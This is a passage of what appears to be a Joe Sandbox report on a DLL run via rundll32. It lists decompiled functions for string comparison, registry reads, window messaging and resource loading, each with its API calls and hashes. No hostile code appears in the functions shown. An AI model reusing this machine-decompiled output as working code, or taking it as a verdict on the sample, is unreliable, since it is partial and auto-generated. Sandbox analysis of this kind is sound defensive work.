				 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
				_t57 =  *(_t68 - 0x48);
				_t40 =  *(_t68 - 0x34);
				if(_t40 != 0) {
					L4:
					if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x10),  *(_t68 + 0x14), _t40, _t57) != 0) {
						_t67 = MultiByteToWideChar( *(_t68 + 0x20), 9,  *(_t68 + 0x18),  *(_t68 + 0x1c), 0, 0);
						 *(_t68 - 0x4c) = _t67;
						if(_t67 != 0) {
							 *(_t68 - 4) = 1;
							E100116D0(_t67 + _t67 + 0x00000003 & 0xfffffffc, _t58);
							 *(_t68 - 0x18) = _t69;
							_t64 = _t69;
							 *(_t68 - 0x50) = _t64;
							 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
							if(_t64 != 0) {
								L10:
								if(MultiByteToWideChar( *(_t68 + 0x20), 1,  *(_t68 + 0x18),  *(_t68 + 0x1c), _t64, _t67) != 0) {
									 *((intOrPtr*)(_t68 - 0x40)) = CompareStringW( *(_t68 + 8),  *(_t68 + 0xc),  *(_t68 - 0x34), _t57, _t64, _t67);
								}
								if( *(_t68 - 0x44) != 0) {
									_push(_t64);
									E1001111B();
								}
							} else {
								_t64 = E10011233(_t67 + _t67);
								if(_t64 != 0) {
									 *(_t68 - 0x44) = 1;
									goto L10;
								}
							}
						}
					}
					if( *((intOrPtr*)(_t68 - 0x3c)) != 0) {
						_push( *(_t68 - 0x34));
						E1001111B();
					}
					_t42 =  *((intOrPtr*)(_t68 - 0x40));
				} else {
					_t40 = E10011233(_t57 + _t57);
					_pop(_t58);
					 *(_t68 - 0x34) = _t40;
					if(_t40 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t68 - 0x3c)) = 1;
						goto L4;
					}
				}
				return E10012D1B(E10011A49(_t42,  *((intOrPtr*)(_t68 - 0x1c))));
			}

APIs

Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
Part of subcall function 100114D8: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9AD
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100108AC,00000000,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9CA
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100108AC,?,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001CA40
CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001CA56

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
String ID:
API String ID: 1997773198-0
Opcode ID: ebfc69af8520cc5b7db72a0f94127b0aed85610ace023d4169a4354396c1be3a
Instruction ID: a8cdb39f24e1e967be4b4b359fa5767401671b4154b716162f0d0c7b8958fa92
Opcode Fuzzy Hash: ebfc69af8520cc5b7db72a0f94127b0aed85610ace023d4169a4354396c1be3a
Instruction Fuzzy Hash: 67315A7280121CEBDF12CFA0DC45ADEBBB5FF08754F640104F910AA1A0DB30DA91DB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001697E Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001697E() {
				void* __ebp;
				signed int _t5;
				intOrPtr _t6;
				signed int _t11;
				void* _t12;
				signed int _t13;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t26;
				char* _t27;
				void* _t30;
				intOrPtr _t32;

				_t32 =  *0x1003ba4c; // 0x1
				if(_t32 == 0) {
					_t5 = E10012B24();
				}
				_t26 =  *0x1003a160; // 0x0
				_t24 = 0;
				if(_t26 != 0) {
					while(1) {
						_t6 =  *_t26;
						if(_t6 == 0) {
							break;
						}
						if(_t6 != 0x3d) {
							_t24 = _t24 + 1;
						}
						_t26 = _t26 + E10012000(_t26) + 1;
					}
					_t5 = E10011233(4 + _t24 * 4);
					_t25 = _t5;
					 *0x1003a194 = _t25;
					if(_t25 != 0) {
						_t27 =  *0x1003a160; // 0x0
						while( *_t27 != 0) {
							_t30 = E10012000(_t27) + 1;
							if( *_t27 == 0x3d) {
								L14:
								_t27 = _t27 + _t30;
								continue;
							}
							_t12 = E10011233(_t30);
							 *_t25 = _t12;
							if(_t12 == 0) {
								_push( *0x1003a194);
								_t13 = E1001111B();
								 *0x1003a194 = 0;
								_t11 = _t13 | 0xffffffff;
								L17:
								return _t11;
							}
							E10018100(_t12, _t27);
							_t25 = _t25 + 4;
							goto L14;
						}
						_push( *0x1003a160);
						E1001111B();
						 *0x1003a160 = 0;
						 *_t25 = 0;
						 *0x1003ba40 = 1;
						_t11 = 0;
						goto L17;
					}
					goto L9;
				} else {
					L9:
					return _t5 | 0xffffffff;
				}
			}

APIs

___initmbctable.LIBCMT ref: 1001698B
_strlen.LIBCMT ref: 100169A4
_strlen.LIBCMT ref: 100169DD
_strcat.LIBCMT ref: 100169FA

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$___initmbctable_strcat
String ID:
API String ID: 109824703-0
Opcode ID: 717aadb1e26b71317ee544c053848e46776130a65afe85ff3f16a5ab4fb1cad3
Instruction ID: da45c1c96dbea4fc8541333c58f74f831b575934684ebe3a29e1dc97d659d8db
Opcode Fuzzy Hash: 717aadb1e26b71317ee544c053848e46776130a65afe85ff3f16a5ab4fb1cad3
Instruction Fuzzy Hash: ED1189728085645FF323DF605C8064A7BD9FB0A2A4B21012EF6908F162CB34E8C1DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2BC Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C2BC(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E10011A8C(E1002ABEC, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1002c6bc;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E10024DD7();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E100250CC(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E10024C41( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1002c6ac;
				E10025123(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}

APIs

__EH_prolog.LIBCMT ref: 1000C2C1
GetDC.USER32(?), ref: 1000C2FA
CreateRectRgnIndirect.GDI32(?), ref: 1000C33D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateH_prologIndirectRect
String ID:
API String ID: 2123978231-0
Opcode ID: 59661191850b4aec87681aff55e74d871da990b98148a2480edac10668ff53cf
Instruction ID: 2d32c559a3666166c725aa369185452b7082f210ee70bac2ef3761f3e5453f97
Opcode Fuzzy Hash: 59661191850b4aec87681aff55e74d871da990b98148a2480edac10668ff53cf
Instruction Fuzzy Hash: 6A213976910219EBDB01DFA4D984D8EB7B8FF09781F618066E901EB245C771AE01CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 10026B36 Relevance: 6.1, APIs: 4, Instructions: 71
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026B36(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x100361b8; // 0x1002bc94
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x100361b8;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x10036180
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}

APIs

RegOpenKeyExA.ADVAPI32(80000001,100361B8,00000000,00000001,?), ref: 10026B79
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10026B99
RegCloseKey.ADVAPI32(?), ref: 10026BDD
RegCloseKey.ADVAPI32(00000000), ref: 10026BF3

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID:
API String ID: 1607946009-0
Opcode ID: cc5f0c99c487882ade0354347c01d17bd8f5ae0b98e1250bf4d183fc974c7e55
Instruction ID: c96fa91f90e85e768a28330d4fbd3614d76b6cf8de282428f297b7c8f9744a42
Opcode Fuzzy Hash: cc5f0c99c487882ade0354347c01d17bd8f5ae0b98e1250bf4d183fc974c7e55
Instruction Fuzzy Hash: CF214F71D00219EFEB02CF85DC85AAEBBF8EF54755F6180AAE415E6151D3705A45CF20

Uniqueness

Uniqueness Score: -1.00%

Function 1000D486 Relevance: 6.1, APIs: 4, Instructions: 66
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E1000D486(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D409( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000CCB3( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}

APIs

SafeArrayDestroy.OLEAUT32 ref: 1000D4A5
CoTaskMemFree.OLE32(?), ref: 1000D521

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: a07d396bbf0a29ec4320d3e374e7d046f4127018dcad5f6126624739024cb51f
Instruction ID: a0175064a0a85c4cafe7825df45cf47a0c0107eac02822587324b58b302c8d00
Opcode Fuzzy Hash: a07d396bbf0a29ec4320d3e374e7d046f4127018dcad5f6126624739024cb51f
Instruction Fuzzy Hash: 2A115E30500A16DBFB50EF64DC84BAE7BE4FF013D6F204417EC558A1A8CB34E901DA60

Uniqueness

Uniqueness Score: -1.00%

Function 1000C404 Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1000C404(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E10011A8C(E1002ABEC, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1002c6bc;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E100250BE();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E1000B8D2( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1002c6ac;
				E10025123(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}

APIs

__EH_prolog.LIBCMT ref: 1000C409
GetRgnBox.GDI32(?,?), ref: 1000C44A
IntersectRect.USER32 ref: 1000C45F
EqualRect.USER32 ref: 1000C46D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$EqualH_prologIntersect
String ID:
API String ID: 2227276553-0
Opcode ID: f49d3fc44bbea1a9a3703b3f7f4095f6500e4823f07a0e2dd16f70af3848267f
Instruction ID: 893439b2a63fa3b6d9f12e039fea2b97180e1d04971d70f679ed86cc273fc7ba
Opcode Fuzzy Hash: f49d3fc44bbea1a9a3703b3f7f4095f6500e4823f07a0e2dd16f70af3848267f
Instruction Fuzzy Hash: 6221F97290121DEFDB11DF94D984DEEBBB9FF08291B51456AF911E3210D731AE01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001EFD9 Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001EFD9(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E10027747() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001EFFF
LoadResource.KERNEL32(?,00000000), ref: 1001F007
LockResource.KERNEL32(00000000), ref: 1001F019
FreeResource.KERNEL32(00000000), ref: 1001F063

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 79a385958bd1abbb51bdfa13ab21794ec82e837399486797c07fe0982f095651
Instruction ID: 1cbb828e628f50f529575e252a8895c21c2b2b58810a8f6a494f9e13ac8a3601
Opcode Fuzzy Hash: 79a385958bd1abbb51bdfa13ab21794ec82e837399486797c07fe0982f095651
Instruction Fuzzy Hash: 19110639500751EFD721DF64C984AAAB3F4FF08795F10441CE8425B652D770ED89CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10023732 Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10023732(void* __ecx, void* __esi) {
				void* _v8;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				if(E1001F51F(0x10) == 0) {
					_t30 = 0;
				} else {
					_t30 = E100236CC(_t9, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100245CA(GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10023766
GetCurrentProcess.KERNEL32(?,00000000), ref: 1002376C
DuplicateHandle.KERNEL32(00000000), ref: 1002376F
GetLastError.KERNEL32(?), ref: 1002378A

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 8f8e11b02ad6b27f87fa78a2d95db45119702c23b49027810cea871847f9838c
Instruction ID: 6cc17aeaeb9afa8b9fba9f6a3535c94d6366e8751b0624092107e80d48062149
Opcode Fuzzy Hash: 8f8e11b02ad6b27f87fa78a2d95db45119702c23b49027810cea871847f9838c
Instruction Fuzzy Hash: 2701D4B5704200BBEF10DBB5DC89F1A7BA9EF84360F648515FA05CB291DB71EC019760

Uniqueness

Uniqueness Score: -1.00%

Function 10021E91 Relevance: 6.1, APIs: 4, Instructions: 52
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10021E91(intOrPtr* __ecx) {
				struct HWND__* _t14;
				intOrPtr* _t23;

				_t23 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					 *((intOrPtr*)( *__ecx + 0x16c))();
				}
				SendMessageA( *(_t23 + 0x1c), 0x1f, 0, 0);
				E10021328( *(_t23 + 0x1c), 0x1f, 0, 0, 1, 1);
				SendMessageA( *(E1002174E(_t23) + 0x1c), 0x1f, 0, 0);
				E10021328( *((intOrPtr*)(_t11 + 0x1c)), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}

0x10021e93
0x10021ea0
0x10021ea6
0x10021ea6
0x10021ebb
0x10021ec8
0x10021edd
0x10021eea
0x10021eef
0x10021ef7
0x00000000
0x10021efe
0x10021f03

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10021EBB
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10021EDD
GetCapture.USER32 ref: 10021EEF
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 10021EFE

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 7745c5cf18dbb8e097cb719fce5a3a3cecae1f2ec1f211fb07572704fc919427
Instruction ID: 94b43e5626eecd317cc7524982896972bfb8adcbcc776780cf9d1af5025c7500
Opcode Fuzzy Hash: 7745c5cf18dbb8e097cb719fce5a3a3cecae1f2ec1f211fb07572704fc919427
Instruction Fuzzy Hash: 8A016DB434030C7FFB30AB24ACC9FBB76AEEF88785F510474F641AA5D2CAA15C015A60

Uniqueness

Uniqueness Score: -1.00%

Function 10021328 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E10021328(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10020AB3();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E10021051();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10021328(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 10021336
GetTopWindow.USER32(00000000), ref: 10021375
GetWindow.USER32(00000000,00000002), ref: 10021393

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 4c2aab846cc6292fe81b3f77265c7904519cb297191cd0370932cf9f4aceac36
Instruction ID: 66ff45678a35050836993a23ce6722b5d198dd4aa02555eaab83d79fc53be760
Opcode Fuzzy Hash: 4c2aab846cc6292fe81b3f77265c7904519cb297191cd0370932cf9f4aceac36
Instruction Fuzzy Hash: 6901293A00061ABBCF02DF90AC04EDE3BABFF18390F914010FA0450421C776CA62EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10026066 Relevance: 6.0, APIs: 4, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10026066(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x100371f4; // 0x82d1d2ba
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, "%d", _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E1002816B(__ecx, _a4);
